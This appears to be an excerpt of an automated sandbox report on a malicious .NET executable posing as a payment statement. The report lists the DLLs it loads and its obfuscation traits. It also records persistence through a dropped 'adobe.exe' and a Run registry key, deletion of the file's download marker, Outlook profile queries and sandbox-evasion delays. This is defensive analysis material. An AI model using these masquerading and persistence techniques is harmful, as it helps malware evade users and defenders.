                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: Statement of Account - USD 16,720.00.exe, RandomClothingAttributesf.cs .Net Code: Polan System.AppDomain.Load(byte[])
                    Source: adobe.exe.1.dr, RandomClothingAttributesf.cs .Net Code: Polan System.AppDomain.Load(byte[])
                    Source: Statement of Account - USD 16,720.00.exe Static PE information: 0x9FFD5834 [Thu Jan 21 21:42:12 2055 UTC]
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Code function: 1_2_00F00600 push edx; retf 0000h 1_2_00F0061A
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Code function: 1_2_00F00C55 push edi; retf 1_2_00F00C7A
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Code function: 1_2_06752345 push edi; ret 1_2_06752346
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Code function: 1_2_067BFBD1 push eax; ret 1_2_067BFBDD
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 6_2_01250C55 push edi; retf 6_2_01250C7A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 6_2_0125EED0 pushad ; ret 6_2_0125EED1
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 6_2_06B2866D push esp; iretd 6_2_06B28675
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 6_2_06B28068 push esp; iretd 6_2_06B28071
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 6_2_06B2767F push es; ret 6_2_06B27680
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 6_2_06B2B7A0 push es; ret 6_2_06B2B7B0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 8_2_04F70CF8 push 2804E9CFh; iretd 8_2_04F70CFD
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 9_2_00E0EED0 pushad ; ret 9_2_00E0EED1
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 9_2_0684866D push esp; iretd 9_2_06848675
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 9_2_06848068 push esp; iretd 9_2_06848071
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Code function: 9_2_0684B7A0 push es; ret 9_2_0684B7B0
                    Source: Statement of Account - USD 16,720.00.exe Static PE information: section name: .text entropy: 7.494181501767098
                    Source: adobe.exe.1.dr Static PE information: section name: .text entropy: 7.494181501767098
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, Form1.cs High entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, QJDLGErGwGLnDsDTGnUfx.cs High entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, Form1.cs High entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, QJDLGErGwGLnDsDTGnUfx.cs High entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, Form1.cs High entropy of concatenated method names: 'oxycobaltammine', 'fringier', 'unchorded', 'wAhRr7CKv', 'Dispose', 'lVOGV1721', 'ULHqFVpPeqZbNsBNpV', 'TchE2TMnA4CKf52ZUf', 'f0mq9hQrUpsqOwSyGd', 'nTd0Zl0tx6BYOWEqZW'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, QJDLGErGwGLnDsDTGnUfx.cs High entropy of concatenated method names: 'pwiMsJJwOLAUrsrsiLrJk', 'vkJkyBAyMrJJZpZnJUUsB', 'pBDTEixOwwhDhOiywipLh', 'wZnEyxixGJZZTGvwQsrMDAvGiTwBJLT', 'erhT', 'aerhTteS46w', 'LvfQyBLvviAnvZJBUkfipTGCDTvQDxU', 'F6WFViyxW', 'TE3wDwuNS', 'MyGetProcAddressWrapper'

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File created: \statement of account - usd 16,720.00.exe
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe (dropped file)
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594341Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598466Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598029Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597921Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597617Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597479Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596749Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596421Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594740Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594604Jump to behavior
